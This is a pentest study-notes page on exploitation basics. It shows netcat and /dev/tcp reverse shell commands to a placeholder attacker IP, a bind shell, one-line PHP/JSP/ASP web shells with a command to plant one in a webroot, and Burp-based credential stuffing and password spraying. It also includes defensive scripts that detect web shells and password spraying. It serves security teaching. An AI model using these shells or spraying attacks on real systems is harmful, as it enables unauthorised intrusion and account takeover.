# Exploitation (basics)

Exploitation is the attack performed against a system or application based on the potential vulnerability discovered during our information gathering and enumeration.\
We use the information from the Information Gathering stage, analyze it in the Vulnerability Assessment stage, and prepare the potential attacks.\
Often many companies and systems use the same applications but make different decisions about their configuration.\
This is because the same application can often be used for various purposes, and each organization will have different objectives.

> *Source: Hackthebox Academy*

## Shells

### Reverse shell

![image](https://user-images.githubusercontent.com/96747355/175835538-b00ec472-e4b3-4688-b062-25d37837b8b1.png)

> *Source:*[*hackingtutorials.org*](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/)

* The target connects back to us. Initiates a connection back to a "listener" on our attack box.
* Example
  * in our attacking machine we type `nc -nlvp 4444` (4444 is the port)
  * on the target we connect back. For instance, on a Linux-based machine we can run `netcat ATTACKING-MACHINE-IP 4444 -e /bin/bash`; we could also use `/bin/bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1`

### Bind shell

![image](https://user-images.githubusercontent.com/96747355/175835567-7bb7a51d-7761-4cc8-983a-cc7087dacaac.png)

> *Source:*[*hackingtutorials.org*](https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/)

* We connect to the target. "Binds" to a specific port on the target host and waits for a connection from our attack box.
* Example
  * in our target we can do `nc -nlvp 4444 -e /bin/bash`
  * in our attacking machine we can do `nc TARGET-IP 4444`

### Web shell

* Runs operating system commands via the web browser, typically non-interactive or semi-interactive. It can also be used to run single commands (e.g., leveraging a file upload vulnerability and uploading a PHP script that runs one command).
* Communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output.

#### PHP web shell

```php
<?php system($_REQUEST["cmd"]); ?>
```

#### JSP web shell

```jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```

#### ASP web shell

```asp
<% eval request("cmd") %>
```

#### Where to upload it

| Web Server | Default Webroot          |
| ---------- | ------------------------ |
| Apache     | `/var/www/html/`         |
| Nginx      | `/usr/local/nginx/html/` |
| IIS        | `c:\inetpub\wwwroot\`    |
| XAMPP      | `C:\xampp\htdocs\`       |

* `echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php` is the bash command for an Apache web server on Linux
* To access it `shell.php?cmd=id` with the browser
* `curl http://SERVER_IP:PORT/shell.php?cmd=id` with the command line
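From the defender's side, the three one-liners above are also what a webroot integrity check should look for. The following scanner is an added example (not from the page or its sources): it walks a webroot and flags files whose content matches those patterns; the signature labels, file names and the temporary webroot are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Signatures derived from the three one-line web shells shown above.
# Labels are constructed for this example, not an established naming scheme.
SIGNATURES = {
    "php_system_request": re.compile(
        r"(system|exec|passthru|shell_exec)\s*\(\s*\$_(REQUEST|GET|POST)\b"),
    "jsp_runtime_exec": re.compile(
        r"Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter\("),
    "asp_eval_request": re.compile(r"\beval\s+request\s*\(", re.IGNORECASE),
}
SCRIPT_SUFFIXES = {".php", ".phtml", ".jsp", ".asp", ".aspx"}

def scan_text(text: str) -> list[str]:
    """Return the labels of every signature that matches the given content."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_file(path: Path) -> list[str]:
    """Read one file tolerantly (unreadable or binary files are skipped)."""
    try:
        return scan_text(path.read_text(errors="ignore"))
    except OSError:
        return []

def scan_webroot(root: Path) -> dict[str, list[str]]:
    """Walk the webroot and map each suspicious file to its matched labels."""
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES:
            matched = scan_file(p)
            if matched:
                hits[p.relative_to(root).as_posix()] = matched
    return hits

def demo() -> dict[str, list[str]]:
    """Constructed webroot: one benign page plus the three shells from the page."""
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "uploads/shell.php": '<?php system($_REQUEST["cmd"]); ?>',
        "cmd.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
        "cmd.asp": '<% eval request("cmd") %>',
    }
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in samples.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return scan_webroot(root)

if __name__ == "__main__":
    for path, labels in demo().items():
        print(f"{path}: {', '.join(labels)}")
```

Pair this with a hash baseline of the deployed webroot: a new `.php` file under an upload directory is suspicious regardless of whether it matches a known pattern.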

## Payloads

![image](https://user-images.githubusercontent.com/96747355/175836279-e0f0e004-c75a-4d8e-b4de-9680e1b5306a.png)

> *Source:*[*TCM Academy*](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)

* If one type of payload does not work we can try the other one

## Bruteforce attacks

* Check out how to use hydra [here](https://csbygb.gitbook.io/pentips/tools/passwords-tools#hydra)
* We can also use Metasploit, which has multiple modules for bruteforce attacks

## Credentials stuffing and password spraying

* Methodology
  * Use the leaked creds found during the enumeration phase on the login portals found during that same phase
* The goal of credential stuffing and password spraying is to take these credentials and throw them at a website
* We can use Burp Intruder for this
  * First we look at what we get back when a login fails, and copy the string we get back
  * We send the login request to Intruder and mark the login and password as variables
  * We use a pitchfork attack
  * We make a grep-match on the string previously copied
  * Then in the payloads we load the list of users for the variable that corresponds to the user and the list of passwords for the one that corresponds to the password. Then we launch the attack.
  * In the results, the grep match shows us which attempts are not valid. We can also check the response code (301 is a redirect, for example) and the length of the response (if it differs noticeably in one of the results)
* Password spraying: we can also try one password against multiple usernames
  * Caution here: prior to your engagement, check whether a lockout policy is in place and how many attempts are allowed before an account is locked out. Once we know this, we can set up our attack to try something every hour or so.
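The lockout caveat above is also why spraying is easy to miss with per-account lockout counters alone: each account sees only one or two failures. The detection logic below is an added example (not from the page or its sources) that looks at the pattern from the other direction, one source failing against many distinct accounts inside a short window; the log lines are constructed, OpenSSH-style samples and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth log (OpenSSH-style lines, not real data): one source
# tries one password against many accounts; another source is a normal user.
SAMPLE_LOG = """\
Jun 27 10:00:01 web01 sshd[1201]: Failed password for alice from 203.0.113.5 port 51000 ssh2
Jun 27 10:00:09 web01 sshd[1202]: Failed password for bob from 203.0.113.5 port 51001 ssh2
Jun 27 10:00:17 web01 sshd[1203]: Failed password for carol from 203.0.113.5 port 51002 ssh2
Jun 27 10:00:25 web01 sshd[1204]: Failed password for invalid user dave from 203.0.113.5 port 51003 ssh2
Jun 27 10:00:33 web01 sshd[1205]: Failed password for erin from 203.0.113.5 port 51004 ssh2
Jun 27 10:01:02 web01 sshd[1206]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Jun 27 10:01:05 web01 sshd[1207]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Jun 27 10:01:10 web01 sshd[1208]: Accepted password for alice from 198.51.100.7 port 40002 ssh2
"""

FAIL_RX = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

def parse_failures(log: str, year: int = 2022):
    """Yield (timestamp, user, source_ip) for every failed-login line."""
    for line in log.splitlines():
        m = FAIL_RX.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]

def detect_spray(log: str, window=timedelta(minutes=10), min_users: int = 4):
    """Map source IP -> sorted accounts for sources that fail against at least
    min_users distinct accounts inside one sliding window (assumed thresholds)."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(log):
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged

if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE_LOG).items():
        print(f"possible password spray from {ip} against {len(users)} accounts: {users}")
```

The same grouping works on web login logs or Windows 4625 events once the parser is swapped; a slow spray that spaces attempts by an hour needs a correspondingly longer window.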

## Possible paths after this step

| Path                  | Description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    |
| --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| Information Gathering | Once we have initial access to the target system, regardless of how high our privileges are at that moment, we need to gather information about the local system. Whether we use this new information for privilege escalation, lateral movement, or data exfiltration does not matter. Therefore, before we can take any further steps, we need to find out what we are dealing with. This inevitably takes us to the vulnerability assessment stage, where we analyze and evaluate the information we find.                                                                                                                  |
| Post-Exploitation     | Post-exploitation is mainly about escalating privileges if we have not yet attained the highest possible rights on the target host. As we know, more opportunities are open to us with higher privileges. This path actually includes the stages Information Gathering, Vulnerability Assessment, Exploitation, and Lateral Movement but from an internal perspective on the target system. The direct jump to post-exploitation is less frequent, but it does happen. Because through the exploitation stage, we may already have obtained the highest privileges, and from here on, we start again at Information Gathering. |
| Lateral Movement      | From here, we can also skip directly over to Lateral Movement. This can come under different conditions. If we have achieved the highest privileges on a dual-homed system used to connect two networks, we can likely use this host to start enumerating hosts that were not previously available to us.                                                                                                                                                                                                                                                                                                                      |
| Proof-of-Concept      | We can take the last path after gaining the highest privileges by exploiting an internal system. Of course, we do not necessarily have to have taken over all systems. However, if we have gained the Domain Admin privileges in an Active Directory environment, we can likely move freely across the entire network and perform any actions we can imagine. So we can create the Proof-of-Concept from our notes to detail and potentially automate the paths and activities and make them available to the technical department.                                                                                            |

> *Source: HTB Academy*

## Resources

{% embed url="https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/" %}
Hacking Tutorials
{% endembed %}

{% embed url="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course" %}
Practical Ethical Hacking - TCM Security
{% endembed %}
